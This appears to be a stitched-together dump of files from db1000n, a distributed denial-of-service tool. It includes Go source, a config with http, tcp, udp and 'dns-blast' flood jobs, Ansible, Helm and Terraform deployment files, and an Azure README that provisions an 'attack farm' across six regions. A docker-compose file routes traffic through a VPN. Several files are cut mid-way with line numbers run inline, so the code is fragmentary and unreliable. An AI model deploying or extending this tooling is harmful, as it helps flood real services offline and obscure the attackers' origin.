chaining. 17 | func (a *Accumulator) Add(target string, s Stat, n uint64) *Accumulator { 18 | a.stats[s][target] += n 19 | 20 | return a 21 | } 22 | 23 | // Inc increases Accumulator Stat value by 1. Returns self for chaining. 24 | func (a *Accumulator) Inc(target string, s Stat) *Accumulator { return a.Add(target, s, 1) } 25 | 26 | // Flush Accumulator contents to the Reporter. 27 | func (a *Accumulator) Flush() { 28 | for stat := RequestsAttemptedStat; stat < NumStats; stat++ { 29 | for target, value := range a.stats[stat] { 30 | a.metrics[stat].Store(dimensions{jobID: a.jobID, target: target}, value) 31 | } 32 | } 33 | } 34 | 35 | // Clone a new, blank metrics Accumulator with the same Reporter as the original. 
// getSockaddrByName resolves a network interface name to a syscall.Sockaddr
// usable with syscall.Bind, so outgoing connections can be pinned to that
// interface. Returns nil on any failure (unknown interface, no usable
// address), which callers treat as "do not bind".
//
// The first IPv4 address found wins; only if an address has no IPv4 form is
// its IPv6 form used, with the scope zone set to the interface index.
func getSockaddrByName(name string) syscall.Sockaddr {
	ief, err := net.InterfaceByName(name)
	if err != nil {
		return nil
	}

	addrs, err := ief.Addrs()
	if err != nil {
		return nil
	}

	for _, addr := range addrs {
		// Interface addresses are reported as *net.IPNet; skip anything else.
		ipNet, ok := addr.(*net.IPNet)
		if !ok {
			continue
		}

		if ipBytes := ipNet.IP.To4(); ipBytes != nil {
			var sa4 syscall.SockaddrInet4

			copy(sa4.Addr[:], ipBytes)

			return &sa4
		} else if ipBytes := ipNet.IP.To16(); ipBytes != nil {
			var sa16 syscall.SockaddrInet6

			copy(sa16.Addr[:], ipBytes)
			// Zone (scope) is always set to the interface index here; it is
			// only meaningful for link-local addresses — NOTE(review): confirm
			// setting it for global IPv6 addresses is intended.
			sa16.ZoneId = uint32(ief.Index)

			return &sa16
		}
	}

	return nil
}
getSockaddrByName(name) 65 | if sockAddr == nil { 66 | return nil 67 | } 68 | 69 | var operr error 70 | 71 | if err := conn.Control(func(fd uintptr) { 72 | operr = syscall.Bind(int(fd), sockAddr) 73 | }); err != nil { 74 | return err 75 | } 76 | 77 | return operr 78 | } 79 | } 80 | -------------------------------------------------------------------------------- /src/job/config/updater.go: -------------------------------------------------------------------------------- 1 | package config 2 | 3 | import ( 4 | "bytes" 5 | "context" 6 | "flag" 7 | "os" 8 | "time" 9 | 10 | "go.uber.org/zap" 11 | 12 | "github.com/Arriven/db1000n/src/utils" 13 | ) 14 | 15 | // NewUpdaterOptionsWithFlags returns updater options initialized with command line flags. 16 | func NewUpdaterOptionsWithFlags() (updaterMode *bool, destinationPath *string) { 17 | return flag.Bool("updater-mode", utils.GetEnvBoolDefault("UPDATER_MODE", false), "Only run config updater"), 18 | flag.String("updater-destination-config", utils.GetEnvStringDefault("UPDATER_DESTINATION_CONFIG", "config/config.json"), 19 | "Destination config file to write (only applies if updater-mode is enabled") 20 | } 21 | 22 | func UpdateLocal(logger *zap.Logger, destinationPath string, configPaths []string, backupConfig []byte, skipEncrypted bool) { 23 | lastKnownConfig := &RawMultiConfig{Body: backupConfig} 24 | 25 | for { 26 | rawConfig := FetchRawMultiConfig(context.Background(), logger, configPaths, lastKnownConfig, skipEncrypted) 27 | if !bytes.Equal(lastKnownConfig.Body, rawConfig.Body) { 28 | if err := writeConfig(logger, rawConfig.Body, destinationPath); err != nil { 29 | logger.Error("error writing config", zap.Error(err)) 30 | 31 | return 32 | } 33 | } 34 | 35 | time.Sleep(1 * time.Minute) 36 | } 37 | } 38 | 39 | func writeConfig(logger *zap.Logger, body []byte, destinationPath string) error { 40 | file, err := os.Create(destinationPath) 41 | if err != nil { 42 | return err 43 | } 44 | 45 | defer file.Close() 46 | 47 | size, 
# Provisions a minimal AWS environment: imports an SSH public key, creates a
# security group for management traffic, and launches one Linux and one
# Windows EC2 instance using that key and group.
- name: Prepare AWS account and create instances
  hosts: localhost
  gather_facts: false

  tasks:
    # Import the local AWS.pub public key so instances can be reached via SSH.
    - name: "Add SSH key"
      tags:
        - aws
      amazon.aws.ec2_key:
        name: AWS
        key_material: "{{ lookup('file', 'AWS.pub') }}"

    # NOTE(review): both rules are open to 0.0.0.0/0 — SSH and RDP are
    # reachable from the whole internet. Consider restricting cidr_ip.
    - name: "Create SG with allowed management traffic"
      tags:
        - aws
      amazon.aws.ec2_group:
        name: ddos
        description: Allows management traffic
        rules:
          - rule_desc: SSH
            cidr_ip: 0.0.0.0/0
            proto: tcp
            from_port: 22
            to_port: 22
          - rule_desc: RDP
            cidr_ip: 0.0.0.0/0
            proto: tcp
            from_port: 3389
            to_port: 3389

    # NOTE(review): AMI IDs are region-specific — confirm these IDs exist in
    # the region this playbook targets.
    - name: "Create Linux instance"
      tags:
        - linux
      amazon.aws.ec2_instance:
        name: Linux
        state: running
        instance_type: t2.micro
        security_group: ddos
        image_id: ami-0ae4d073cedc64830
        key_name: "AWS"
        network:
          assign_public_ip: true

    - name: "Create Windows instance"
      tags:
        - windows
      amazon.aws.ec2_instance:
        name: Windows
        state: running
        instance_type: t2.micro
        security_group: ddos
        image_id: ami-06aa8ca602578e4a4
        key_name: "AWS"
        network:
          assign_public_ip: true
        # PowerShell user_data: installs the same public key for the Windows
        # OpenSSH server so the administrator can log in over SSH.
        user_data:
          echo {{ lookup('file', 'AWS.pub') }} > $env:ProgramData\ssh\administrators_authorized_keys
# Deployment template for the db1000n Helm chart.
# Renders one Deployment whose pod runs a single container built from
# .Values.image, with labels/selectors produced by the _helpers.tpl templates.
apiVersion: apps/v1
kind: Deployment
metadata:
  name: {{ include "db1000n.fullname" . }}
  labels:
    {{- include "db1000n.labels" . | nindent 4 }}
spec:
  replicas: {{ .Values.replicaCount }}
  selector:
    matchLabels:
      {{- include "db1000n.selectorLabels" . | nindent 6 }}
  template:
    metadata:
      # Optional pod annotations, emitted only when .Values.podAnnotations is set.
      {{- with .Values.podAnnotations }}
      annotations:
        {{- toYaml . | nindent 8 }}
      {{- end }}
      labels:
        {{- include "db1000n.selectorLabels" . | nindent 8 }}
    spec:
      {{- with .Values.imagePullSecrets }}
      imagePullSecrets:
        {{- toYaml . | nindent 8 }}
      {{- end }}
      securityContext:
        {{- toYaml .Values.podSecurityContext | nindent 8 }}
      containers:
        - name: {{ .Chart.Name }}
          securityContext:
            {{- toYaml .Values.securityContext | nindent 12 }}
          # NOTE(review): no default for .Values.image.tag — an unset tag
          # renders "repo:"; confirm values.yaml always provides one.
          image: "{{ .Values.image.repository }}:{{ .Values.image.tag }}"
          # Environment variables are a list of {name, value} pairs in values.yaml.
          env:
            {{- range .Values.envVars }}
            - name: {{ .name | quote }}
              value: {{ .value | quote }}
            {{- end }}
          imagePullPolicy: {{ .Values.image.pullPolicy }}
          resources:
            {{- toYaml .Values.resources | nindent 12 }}
      # Scheduling constraints, each emitted only when configured in values.yaml.
      {{- with .Values.nodeSelector }}
      nodeSelector:
        {{- toYaml . | nindent 8 }}
      {{- end }}
      {{- with .Values.affinity }}
      affinity:
        {{- toYaml . | nindent 8 }}
      {{- end }}
      {{- with .Values.tolerations }}
      tolerations:
        {{- toYaml . | nindent 8 }}
      {{- end }}
19 | # pull-requests: read 20 | jobs: 21 | golangci: 22 | name: lint 23 | runs-on: ubuntu-latest 24 | steps: 25 | - uses: actions/checkout@v2 26 | - name: Set up Go 27 | uses: actions/setup-go@v2 28 | with: 29 | go-version: 1.18 30 | - name: golangci-lint 31 | uses: golangci/golangci-lint-action@v2 32 | with: 33 | # Optional: version of golangci-lint to use in form of v1.2 or v1.2.3 or `latest` to use the latest version 34 | version: latest 35 | 36 | # Optional: working directory, useful for monorepos 37 | # working-directory: somedir 38 | 39 | # Optional: golangci-lint command line arguments. 40 | # args: --issues-exit-code=0 41 | 42 | # Optional: show only new issues if it's a pull request. The default value is `false`. 43 | # only-new-issues: true 44 | 45 | # Optional: if set to true then the all caching functionality will be complete disabled, 46 | # takes precedence over all other caching options. 47 | # skip-cache: true 48 | 49 | # Optional: if set to true then the action don't cache or restore ~/go/pkg. 50 | # skip-pkg-cache: true 51 | 52 | # Optional: if set to true then the action don't cache or restore ~/.cache/go-build. 53 | # skip-build-cache: true 54 | -------------------------------------------------------------------------------- /.github/workflows/release-docker-advanced.yaml: -------------------------------------------------------------------------------- 1 | # This workflow uses actions that are not certified by GitHub. 2 | # They are provided by a third-party and are governed by 3 | # separate terms of service, privacy policy, and support 4 | # documentation. 
package metrics

import (
	"sort"

	"go.uber.org/zap/zapcore"
)

type (
	// Stat is the type of statistical metrics.
	Stat int
	// Stats contains all metrics packed as an array.
	Stats [NumStats]uint64
	// PerTargetStats is a map of Stats per target.
	PerTargetStats map[string]Stats
)

// Enumeration of tracked statistics. NumStats is a sentinel used as the
// array length of Stats and as the loop bound when iterating all stats.
const (
	RequestsAttemptedStat Stat = iota
	RequestsSentStat
	ResponsesReceivedStat
	BytesSentStat
	BytesReceivedStat

	NumStats
)

// sortedTargets returns the target keys in ascending order so that log
// output is deterministic across runs (map iteration order is random).
func (ts PerTargetStats) sortedTargets() []string {
	res := make([]string, 0, len(ts))
	for k := range ts {
		res = append(res, k)
	}

	sort.Strings(res)

	return res
}

// Diff returns the element-wise difference lhs - rhs.
// NOTE(review): values are uint64, so the subtraction wraps if rhs exceeds
// lhs — this assumes the counters are monotonically non-decreasing; confirm.
func Diff(lhs, rhs Stats) Stats {
	var res Stats
	for i := range res {
		res[i] = lhs[i] - rhs[i]
	}

	return res
}

// Diff returns per-target differences ts - other. A nil other returns ts
// unchanged. Targets missing from other subtract the zero value (i.e. the
// full ts value is kept); targets present only in other are dropped.
func (ts PerTargetStats) Diff(other PerTargetStats) PerTargetStats {
	if other == nil {
		return ts
	}

	res := make(PerTargetStats)
	for k := range ts {
		res[k] = Diff(ts[k], other[k])
	}

	return res
}

// MarshalLogObject is required to log PerTargetStats objects to zap.
// Targets are emitted in sorted order; each target's Stats is nested as a
// sub-object via its own MarshalLogObject.
func (ts PerTargetStats) MarshalLogObject(enc zapcore.ObjectEncoder) error {
	for _, tgt := range ts.sortedTargets() {
		// Copy into a local so we can take its address (map values are not
		// addressable).
		tgtStats := ts[tgt]

		if err := enc.AddObject(tgt, &tgtStats); err != nil {
			return err
		}
	}

	return nil
}

// MarshalLogObject is required to log Stats objects to zap.
// Emits one named uint64 field per tracked statistic.
func (stats *Stats) MarshalLogObject(enc zapcore.ObjectEncoder) error {
	enc.AddUint64("requests_attempted", stats[RequestsAttemptedStat])
	enc.AddUint64("requests_sent", stats[RequestsSentStat])
	enc.AddUint64("responses_received", stats[ResponsesReceivedStat])
	enc.AddUint64("bytes_sent", stats[BytesSentStat])
	enc.AddUint64("bytes_received", stats[BytesReceivedStat])

	return nil
}
3 | */}} 4 | {{- define "db1000n.name" -}} 5 | {{- default .Chart.Name .Values.nameOverride | trunc 63 | trimSuffix "-" }} 6 | {{- end }} 7 | 8 | {{/* 9 | Create a default fully qualified app name. 10 | We truncate at 63 chars because some Kubernetes name fields are limited to this (by the DNS naming spec). 11 | If release name contains chart name it will be used as a full name. 12 | */}} 13 | {{- define "db1000n.fullname" -}} 14 | {{- if .Values.fullnameOverride }} 15 | {{- .Values.fullnameOverride | trunc 63 | trimSuffix "-" }} 16 | {{- else }} 17 | {{- $name := default .Chart.Name .Values.nameOverride }} 18 | {{- if contains $name .Release.Name }} 19 | {{- .Release.Name | trunc 63 | trimSuffix "-" }} 20 | {{- else }} 21 | {{- printf "%s-%s" .Release.Name $name | trunc 63 | trimSuffix "-" }} 22 | {{- end }} 23 | {{- end }} 24 | {{- end }} 25 | 26 | {{/* 27 | Create chart name and version as used by the chart label. 28 | */}} 29 | {{- define "db1000n.chart" -}} 30 | {{- printf "%s-%s" .Chart.Name .Chart.Version | replace "+" "_" | trunc 63 | trimSuffix "-" }} 31 | {{- end }} 32 | 33 | {{/* 34 | Common labels 35 | */}} 36 | {{- define "db1000n.labels" -}} 37 | helm.sh/chart: {{ include "db1000n.chart" . }} 38 | {{ include "db1000n.selectorLabels" . }} 39 | {{- if .Chart.AppVersion }} 40 | app.kubernetes.io/version: {{ .Chart.AppVersion | quote }} 41 | {{- end }} 42 | app.kubernetes.io/managed-by: {{ .Release.Service }} 43 | {{- end }} 44 | 45 | {{/* 46 | Selector labels 47 | */}} 48 | {{- define "db1000n.selectorLabels" -}} 49 | app.kubernetes.io/name: {{ include "db1000n.name" . }} 50 | app.kubernetes.io/instance: {{ .Release.Name }} 51 | {{- end }} 52 | 53 | {{/* 54 | Create the name of the service account to use 55 | */}} 56 | {{- define "db1000n.serviceAccountName" -}} 57 | {{- if .Values.serviceAccount.create }} 58 | {{- default (include "db1000n.fullname" .) 
.Values.serviceAccount.name }} 59 | {{- else }} 60 | {{- default "default" .Values.serviceAccount.name }} 61 | {{- end }} 62 | {{- end }} 63 | -------------------------------------------------------------------------------- /terraform/aws_ec2/variables.tf: -------------------------------------------------------------------------------- 1 | # Default AWS provider vars 2 | variable "region" { 3 | type = string 4 | description = "AWS Region" 5 | } 6 | 7 | variable "name" { 8 | type = string 9 | description = "name of deployment" 10 | } 11 | 12 | variable "arch_ami" { 13 | type = string 14 | description = "architecture of the ami" 15 | default = "arm64" 16 | } 17 | 18 | 19 | variable "instance_type" { 20 | type = string 21 | description = "Instance type" 22 | default = "t4g.micro" 23 | } 24 | 25 | variable "max_size" { 26 | type = number 27 | description = "Max size of autoscale group" 28 | } 29 | 30 | variable "min_size" { 31 | type = number 32 | description = "Min size of autoscale group" 33 | } 34 | 35 | 36 | # Mixed instances policy part 37 | variable "desired_capacity" { 38 | type = number 39 | description = "number of instances to run" 40 | default = 30 41 | } 42 | 43 | variable "zones" { 44 | type = number 45 | description = "number of availability zones" 46 | default = 2 47 | } 48 | 49 | # if you have multiple aws accounts you are managing with 50 | # terraform eg with aws-vault, specify your auth profile here. 51 | # leave null to use default profile 52 | variable "profile" { 53 | type = string 54 | description = "aws auth profile" 55 | default = null 56 | } 57 | 58 | variable "allow_ssh" { 59 | type = bool 60 | description = "allow port 22 access to proxy and db1000n instances" 61 | default = true 62 | } 63 | 64 | # Optional. I use this to set ec2-user's password, enabling serial port 65 | # access to ec2 instances via the AWS console, even for instances in private 66 | # networks. 
APP_NAME := db1000n

# Windows binaries need the .exe suffix.
ifeq ($(GOOS),windows)
APP_NAME := $(addsuffix .exe,$(APP_NAME))
endif

REPOSITORY_BASE_PATH := github.com/Arriven/db1000n
LATEST_TAG := $(shell git describe --tags --abbrev=0)

# Remove debug information (ELF) to strip the binary size
LDFLAGS += -s -w

# Bake optional build-time configuration into package-level variables via -X.
ifneq ($(LATEST_TAG),)
LDFLAGS += -X '$(REPOSITORY_BASE_PATH)/src/utils/ota.Version=$(LATEST_TAG)'
endif
ifneq ($(ENCRYPTION_KEYS),)
LDFLAGS += -X '$(REPOSITORY_BASE_PATH)/src/utils.EncryptionKeys=$(ENCRYPTION_KEYS)'
BUILD_TAGS += encrypted
endif
ifneq ($(DEFAULT_CONFIG_VALUE),)
LDFLAGS += -X '$(REPOSITORY_BASE_PATH)/src/job/config.DefaultConfig=$(DEFAULT_CONFIG_VALUE)'
endif
ifneq ($(DEFAULT_CONFIG_PATH),)
LDFLAGS += -X '$(REPOSITORY_BASE_PATH)/src/job.DefaultConfigPathCSV=$(DEFAULT_CONFIG_PATH)'
endif
ifneq ($(CA_PATH_VALUE),)
LDFLAGS += -X '$(REPOSITORY_BASE_PATH)/src/utils/metrics.PushGatewayCA=$(CA_PATH_VALUE)'
endif
ifneq ($(PROMETHEUS_BASIC_AUTH),)
LDFLAGS += -X '$(REPOSITORY_BASE_PATH)/src/utils/metrics.BasicAuth=$(PROMETHEUS_BASIC_AUTH)'
endif

# None of these targets produce a file with the target's name.
.PHONY: build build_encrypted encrypt_config encrypt_ca docker_build

# Build a static binary (CGO disabled) with the flags assembled above.
build:
	CGO_ENABLED=0 go build -ldflags="${LDFLAGS}" -tags="${BUILD_TAGS}" -o $(APP_NAME) -a ./main.go

# Alias kept for backward compatibility; the encrypted behavior is driven by
# the ENCRYPTION_KEYS variable above, not by the target itself.
build_encrypted: build

# Encrypt $(DEFAULT_CONFIG) with age and print it as a base64 env variable.
# Fix: use mktemp instead of the Debian-only (and now removed) tempfile, and
# printf instead of echo so the \n escape is interpreted in every shell.
encrypt_config:
	@if [ "$(DEFAULT_CONFIG)" = "" ]; then \
		echo "Not specified DEFAULT_CONFIG"; \
	else \
		file=`mktemp` && \
		age --encrypt -p --output $${file} $(DEFAULT_CONFIG) && \
		echo "Saved in file: $${file}"; \
		config=`cat $${file} | base64 | tr -d '\n'` && \
		printf "Save value as env variable: \nexport DEFAULT_CONFIG_VALUE='%s'\n" "$${config}"; \
	fi

# Same as encrypt_config but for the CA certificate at $(CA_PATH).
encrypt_ca:
	@if [ "$(CA_PATH)" = "" ]; then \
		echo "Not specified CA_PATH"; \
	else \
		file=`mktemp` && \
		age --encrypt -p --output $${file} $(CA_PATH) && \
		echo "Saved in file: $${file}"; \
		config=`cat $${file} | base64 | tr -d '\n'` && \
		printf "Save value as env variable: \nexport CA_PATH_VALUE='%s'\n" "$${config}"; \
	fi

docker_build:
	@docker build -t "ghcr.io/arriven/db1000n" -f Dockerfile .
module.network.vpc_id 38 | subnets = module.network.private_subnet_ids 39 | source_security_groups = module.eks_cluster.security_group_id 40 | key_name = var.key_name 41 | public_key = file(var.public_key) 42 | instance_type = var.eks_node_instance_type 43 | desired_capacity = var.eks_node_desired_capacity 44 | max_size = var.eks_node_max_size 45 | min_size = var.eks_node_min_size 46 | } 47 | 48 | # Setup kubernetes 49 | module "kubernetes" { 50 | source = "./modules/kubernetes" 51 | 52 | profile = var.profile 53 | vpc_id = module.network.vpc_id 54 | cluster_name = local.cluster_name 55 | cluster_endpoint = module.eks_cluster.endpoint 56 | cluster_ca_data = module.eks_cluster.ca_data 57 | worker_node_iam_role_arn = module.eks_nodes.worker_node_iam_role_arn 58 | autoscaler_iam_role_arn = module.eks_cluster.autoscaler_iam_role_arn 59 | } -------------------------------------------------------------------------------- /testconfig.json: -------------------------------------------------------------------------------- 1 | { 2 | "jobs": [ 3 | { 4 | "type": "encrypted", 5 | "args": { 6 | "format": "json", 7 | "data": "YWdlLWVuY3J5cHRpb24ub3JnL3YxCi0+IHNjcnlwdCB5eCtiMzQ5RWlZRXo4dTNpRE8veHdRIDE4CmYyb2d0YXlnaXptS25sbUJlQUVaUHpRbngwaUdBYUpJRStHbFltdUVNNkUKLS0tIG5oUUVCd041TWJoNWNCQjhvODk4eUFpUldmUFUvaStpanRsdCtWR0RrSVkK2ehc+JYVl+f5VgLKV0mG/J4CQrtHn+FFV5AAcKiLEAjU6MNDaVqBI6Qm9RunLZ51wAA13DLZkPJH39DcsS77H3HmgLpRQ7DMFG2AIDxWysIt2Yi2hVVn9Ogea73twGa8FOpk2kk0Z7NSHCCcpTJd1Db4cwYJiIFaqfBXR+VZtNk3qBgUMStN1CiOyJxvHbnc6tbfeqq042LImKsaLvFzB2y5H/ec9BonHimrP/aZv6dhequs" 8 | } 9 | }, 10 | { 11 | "type": "http", 12 | "args": { 13 | "request": { 14 | "method": "GET", 15 | "path": "http://localhost:8080/test?queryparam=test&s={{ random_uuid }}", 16 | "headers": { 17 | "Authorization": "wtf" 18 | } 19 | }, 20 | "client": { 21 | "proxy_urls": "{{ join get_proxylist \",\" }}" 22 | }, 23 | "interval_ms": 100 24 | } 25 | }, 26 | { 27 | "type": "tcp", 28 | "count": 100, 29 | "args": { 30 | "address": 
"localhost:9090", 31 | "body": "more_test", 32 | "interval_ms": 1000 33 | } 34 | }, 35 | { 36 | "type": "udp", 37 | "filter": "{{ (.Value (ctx_key \"global\")).EnablePrimitiveJobs }}", 38 | "count": 100, 39 | "args": { 40 | "address": "localhost:9191", 41 | "header": "test", 42 | "body": "more_test", 43 | "interval_ms": 1000 44 | } 45 | }, 46 | { 47 | "type": "http", 48 | "args": { 49 | "request": { 50 | "method": "GET", 51 | "path": "https://127.0.0.1/", 52 | "headers": { 53 | "HOST": "localhost" 54 | } 55 | } 56 | } 57 | }, 58 | { 59 | "type": "dns-blast", 60 | "filter": "{{ (.Value (ctx_key \"global\")).EnablePrimitiveJobs }}", 61 | "args": { 62 | "root_domain": "example.com", 63 | "protocol": "udp", 64 | "seed_domains": ["yahoo.com"], 65 | "parallel_queries": 3, 66 | "interval_ms": 100 67 | } 68 | } 69 | ] 70 | } 71 | -------------------------------------------------------------------------------- /go.mod: -------------------------------------------------------------------------------- 1 | module github.com/Arriven/db1000n 2 | 3 | go 1.18 4 | 5 | require ( 6 | filippo.io/age v1.0.0 7 | github.com/blang/semver v3.5.1+incompatible 8 | github.com/corpix/uarand v0.1.1 9 | github.com/google/gopacket v1.1.19 10 | github.com/google/uuid v1.3.0 11 | github.com/miekg/dns v1.1.47 12 | github.com/mitchellh/mapstructure v1.4.3 13 | github.com/mjpitz/go-ga v0.0.7 14 | github.com/prometheus/client_golang v1.12.1 15 | github.com/rhysd/go-github-selfupdate v1.2.3 16 | github.com/robertkrimen/otto v0.0.0-20211024170158-b87d35c0b86f 17 | github.com/valyala/fasthttp v1.34.0 18 | go.uber.org/zap v1.21.0 19 | golang.org/x/net v0.0.0-20220225172249-27dd8689420f 20 | golang.org/x/sys v0.0.0-20220227234510-4e6760a101f9 21 | gopkg.in/yaml.v3 v3.0.0-20210107192922-496545a6307b 22 | h12.io/socks v1.0.3 23 | ) 24 | 25 | require ( 26 | github.com/andybalholm/brotli v1.0.4 // indirect 27 | github.com/beorn7/perks v1.0.1 // indirect 28 | github.com/cespare/xxhash/v2 v2.1.2 // indirect 29 | 
#!/usr/bin/env bash

# Installer for db1000n: detects OS and CPU architecture, downloads the
# matching release archive from GitHub, verifies its sha256 checksum when a
# checksum tool is available, and unpacks it into the current directory.

set -euo pipefail

REPO=${REPO:-"Arriven/db1000n"}
INSTALL_OS="unknown"

# Map bash's $OSTYPE onto the OS part of the release artifact name.
case "$OSTYPE" in
  solaris*) INSTALL_OS="solaris" ;;
  darwin*) INSTALL_OS="darwin" ;;
  linux*) INSTALL_OS="linux" ;;
  bsd*) INSTALL_OS="bsd" ;;
  msys*) INSTALL_OS="windows" ;;
  cygwin*) INSTALL_OS="windows" ;;
  *) echo "unknown: $OSTYPE"; exit 1 ;;
esac

# Allow callers to override the architecture; default to uname -m.
if [ -z "${OSARCH+x}" ];
then
  OSARCH=$(uname -m);
fi

INSTALL_ARCH="unknown"
case "$OSARCH" in
  x86_64*) INSTALL_ARCH="amd64" ;;
  i386*) INSTALL_ARCH="386" ;;
  i686*) INSTALL_ARCH="386" ;;
  armv6l) INSTALL_ARCH="armv6" ;;
  # armv7l deliberately maps to armv6 — presumably releases only ship armv6
  # builds, which run on armv7 hardware; confirm against release assets.
  armv7l) INSTALL_ARCH="armv6" ;;
  arm*) INSTALL_ARCH="arm64" ;;
  aarch64*) INSTALL_ARCH="arm64" ;;
  *) echo "unknown: $OSARCH"; exit 1 ;;
esac

INSTALL_VERSION="${INSTALL_OS}_${INSTALL_ARCH}"

# Fix: fetch the release metadata once and reuse it. The original issued two
# separate API requests, doubling rate-limit usage and risking the two
# responses describing different releases if one was published in between.
RELEASE_JSON=$(curl -s "https://api.github.com/repos/${REPO}/releases/latest")

BROWSER_DOWNLOAD_URL=$(printf '%s\n' "${RELEASE_JSON}" | grep "${INSTALL_VERSION}" | grep -Eo 'https://[^\"]*')
CHECKSUM_DOWNLOAD_URL=$(printf '%s\n' "${RELEASE_JSON}" | grep "checksums" | grep -Eo 'https://[^\"]*')

ARCHIVE=${BROWSER_DOWNLOAD_URL##*/}
CHECKSUMS_FILE=${CHECKSUM_DOWNLOAD_URL##*/}

echo "Downloading an archive..."
echo "${BROWSER_DOWNLOAD_URL}" | xargs -n 1 curl -s -L -O
echo "Downloading checksums..."
echo "${CHECKSUM_DOWNLOAD_URL}" | xargs -n 1 curl -s -L -O

# macOS ships shasum (needs -a 256); Linux ships sha256sum.
if [ "${INSTALL_OS}" = "darwin" ]
then
  SHA256_BINARY="shasum"
  SHA256_SUFFIX="-a 256"
else
  SHA256_BINARY="sha256sum"
  SHA256_SUFFIX=""
fi

echo "Checking sha256 hash..."
if ! command -v "${SHA256_BINARY}" &> /dev/null
then
  echo "Warning: sha256sum/shasum not found. Could not check archive integrity. Please be careful when launching the executable."
else
  # SHA256_SUFFIX must word-split (it holds "-a 256"), hence no quotes.
  # shellcheck disable=SC2086
  SHA256SUM=$(${SHA256_BINARY} ${SHA256_SUFFIX} ${ARCHIVE})
  if ! grep -q "${SHA256SUM}" "${CHECKSUMS_FILE}"; then
    echo "shasum for ${ARCHIVE} failed. Please check the shasum. File may possibly be corrupted."
    exit 1
  fi
fi

tar xvf "${ARCHIVE}"
echo "Successfully installed db1000n"
ovpn: 61 | condition: service_healthy 62 | updater: 63 | condition: service_started 64 | network_mode: "service:ovpn" 65 | labels: 66 | autoheal: "true" 67 | environment: 68 | STRICT_COUNTRY_CHECK: "true" 69 | # set single or multiple countries to check IP against and exit container if IP matches country OR IP cannot be determined 70 | COUNTRY_LIST: "Country" 71 | CONFIG: "/ko-app/config/config.json" 72 | volumes: 73 | - ../../config:/ko-app/config:z 74 | 75 | secrets: 76 | ovpn_secret: 77 | file: ../../openvpn/auth.txt 78 | -------------------------------------------------------------------------------- /terraform/azure/README.md: -------------------------------------------------------------------------------- 1 | # Deploy via Azure 2 | 3 | ## Prerequisites 4 | 5 | - Install terraform 6 | - Have Azure account. 7 | - [Prepare environment for Azure Provider](https://registry.terraform.io/providers/hashicorp/azurerm/latest/docs) 8 | - [The easiest option for auth is Azure CLI](https://registry.terraform.io/providers/hashicorp/azurerm/latest/docs/guides/azure_cli) 9 | 10 | ## Deployment 11 | 12 | The composition creates container instances in 6 different regions for a broader attack simulation. If you want to make a different setup, just alter modules in the `main.tf`. 13 | 14 | Create a new `terraform.tfvars` file in the folder, if you want to change the default configuration of the farm (`db1000n` can be configured with either command line parameters or environment variables, former having precedence over the latter): 15 | 16 | - `bomblet_count=10` - can be used for custom number of containers per region 17 | - `attack_commands=["/usr/src/app/db1000n","-c=https://link_to_your_config_file"]` 18 | - `attack_environment_variables={"ENABLE_PRIMITIVE":"false"}` 19 | 20 | `terraform init` - to restore all dependencies. 21 | 22 | `terraform apply -auto-approve` - to provision the attack farm. 
23 | 24 | ## Collecting logs from the containers 25 | 26 | The container instances are provisioned without public IP addresses to make the setup more cost effective. 27 | If you deploy more than one container per region, play with the `-01` suffix to get logs from the correct instance. 28 | 29 | - Logs from North Europe region: 30 | 31 | ```sh 32 | az container logs --resource-group main-rg --name main-northeurope-01 --container-name main 33 | ``` 34 | 35 | - Logs from West Europe region: 36 | 37 | ```sh 38 | az container logs --resource-group main-rg --name main-westeurope-01 --container-name main 39 | ``` 40 | 41 | - Logs from Canada Central region: 42 | 43 | ```sh 44 | az container logs --resource-group main-rg --name main-canadacentral-01 --container-name main 45 | ``` 46 | 47 | - Logs from UAE North region: 48 | 49 | ```sh 50 | az container logs --resource-group main-rg --name main-uaenorth-01 --container-name main 51 | ``` 52 | 53 | - Logs from Central US region: 54 | 55 | ```sh 56 | az container logs --resource-group main-rg --name main-centralus-01 --container-name main 57 | ``` 58 | 59 | - Logs from East Asia region: 60 | 61 | ```sh 62 | az container logs --resource-group main-rg --name main-eastasia-01 --container-name main 63 | ``` 64 | 65 | ## Cleanup 66 | 67 | ```sh 68 | terraform destroy 69 | ``` 70 | -------------------------------------------------------------------------------- /src/core/packetgen/serialization.go: -------------------------------------------------------------------------------- 1 | // MIT License 2 | 3 | // Copyright (c) [2022] [Bohdan Ivashko (https://github.com/Arriven)] 4 | 5 | // Permission is hereby granted, free of charge, to any person obtaining a copy 6 | // of this software and associated documentation files (the "Software"), to deal 7 | // in the Software without restriction, including without limitation the rights 8 | // to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | // copies of the 
Software, and to permit persons to whom the Software is 10 | // furnished to do so, subject to the following conditions: 11 | 12 | // The above copyright notice and this permission notice shall be included in all 13 | // copies or substantial portions of the Software. 14 | 15 | // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | // IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | // FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | // AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | // LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | // OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | // SOFTWARE. 22 | 23 | package packetgen 24 | 25 | import ( 26 | "fmt" 27 | 28 | "github.com/google/gopacket" 29 | ) 30 | 31 | var opts = gopacket.SerializeOptions{ 32 | FixLengths: true, 33 | ComputeChecksums: true, 34 | } 35 | 36 | func SerializeLayers(payloadBuf gopacket.SerializeBuffer, layers ...gopacket.Layer) error { 37 | serializableLayers := make([]gopacket.SerializableLayer, 0, len(layers)) 38 | 39 | for _, layer := range layers { 40 | if layer == nil { 41 | continue 42 | } 43 | 44 | serializableLayer, err := toSerializable(layer) 45 | if err != nil { 46 | return err 47 | } 48 | 49 | serializableLayers = append(serializableLayers, serializableLayer) 50 | } 51 | 52 | return gopacket.SerializeLayers(payloadBuf, opts, serializableLayers...) 
